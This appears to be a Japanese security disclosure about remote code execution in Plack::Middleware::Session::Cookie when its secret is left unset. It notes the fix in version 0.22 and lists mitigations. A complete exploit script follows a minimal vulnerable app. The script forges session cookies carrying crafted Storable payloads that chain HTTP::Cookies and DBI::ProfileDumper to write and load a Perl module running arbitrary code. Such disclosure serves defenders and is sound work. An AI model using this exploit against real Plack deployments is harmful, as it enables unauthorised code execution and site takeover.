Plack::Middleware::Session::Cookie で secret未指定の場合のremote code executionについて

aaa.md

この問題は Plack::Middleware::Session::Cookie 0.22以降で対策されました

→ https://gist.github.com/miyagawa/2b8764af908a0dacd43d http://search.cpan.org/~miyagawa/Plack-Middleware-Session/lib/Plack/Middleware/Session/Cookie.pm

事例 → https://speakerdeck.com/mala/how-to-hack-metacpan-dot-org

---

信頼できないデータを Storable::thaw に渡した場合、任意のコード実行ができることが知られています。

• http://perl5.git.perl.org/perl.git/commit/664f237a84176c09b20b62dbfe64dd736a7ce05e
• http://www.masteringperl.org/2012/12/the-storable-security-problem/

cookie経由でStorable::thawが呼ばれるモジュールがいくつか報告されています。

• http://seclists.org/oss-sec/2013/q2/313

DESTROYで自動実行されるコードを通じて、ある程度自由に任意のコードを実行することが出来ます。

• ファイルの削除 : 一時ファイルや一時ディレクトリを名前を指定して消せるもの
• ファイルの書き込み : autosaveやautoflush機能を通じて任意のファイル名に書き込みが出来るもの

今のところ、任意のPerlモジュールを生成可能であると確認できているのは、HTTP::CookiesとDBI::ProfileDumperを組み合わせた方法です。

• https://gist.github.com/mala/82074a542d703247a481

Plack::Middleware::Session::Cookie ではsecretの指定が可能になっていますが、デフォルトではsecretが未設定になっています。 あるいはsecretが漏洩した場合に、セッションオブジェクトの改竄が可能になっています。

secretが未指定のまま動いているプロダクトがいくつかあると思われます。

• https://github.com/search?q=plack+middleware+enable+"Session%3A%3ACookie"%3B&type=Code&ref=searchresults

手元で動作させたmetacpan.orgでは、DBI::ProfileDumperが無かったので任意のコード実行までは試せていませんが、 少なくともテンプレートファイルの書き換えが出来ることを確認しました。

Plack::Middleware::Session::Cookieでは、下記のいずれかの(あるいは全部)対応が必要ではないかと思います

• secretの指定を必須にする
• シリアライザを変更する
• 危険であるとドキュメントに記述する

app.psgi

use strict;
use warnings;
use Plack::Builder;
use lib ".";

builder {
        enable "Session::Cookie";
        sub {
                my $env = shift;
                my $session;
                my $session = $env->{'psgix.session'};
                $session->{count}++;
                [200, ["content-type" => "text/html"], ["hoge" . $session->{count}]]
        }
}

plack_middleware_session_cookie_exploit.pl

use MIME::Base64;
use LWP::UserAgent;
use Storable;
use Data::Dumper;
use Digest::HMAC_SHA1;

my $target = "http://localhost:5000";
my $secret = ""; # or stolen secret
my $cookie_name = "plack_session";
my $code = 'warn q{Hacked!!}; exit;';

request("\5\b\3\0\0\0\1\24\21\rHTTP::Cookies\3\0\0\0\0\0\0\0\1a");
request("\5\b\3\0\0\0\1\24\21\22DBI::ProfileDumper\3\0\0\0\0\0\0\0\1a");
request(Storable::nfreeze(bless(
            { autosave => 1, COOKIES => {}, file => "TmpTmp.pm" },
            "HTTP::Cookies"
		)
));

request(
    Storable::nfreeze(
        bless(
            {
                _wrote_header => "TmpTmp.pm",
                File          => "TmpTmp.pm",
                LockFile      => 1,
                Data          => { ";\$xxx" => ["11111; package TmpTmp; $code ; 1; #aaa"] }
			}, "DBI::ProfileDumper"
		)
	)
);
request("\5\b\3\0\0\0\1\24\21\6TmpTmp\3\0\0\0\0\0\0\0\1a");

sub create_cookie { 
	my $data = shift;
	my $b64 = MIME::Base64::encode($data , '');
	if ($secret) {
		my $sig = Digest::HMAC_SHA1::hmac_sha1_hex($b64, $secret);
		return $b64 . "%3A" . $sig;
	} else {
		return $b64 . "%3A."
	}
}

sub request {
	my $data = shift;
	my $ua = LWP::UserAgent->new;
	my $cookie = create_cookie($data);
	my $res = $ua->get($target, 
		Cookie => $cookie_name . "=".time.'%3A'.$cookie
	);
	warn Dumper $res;
}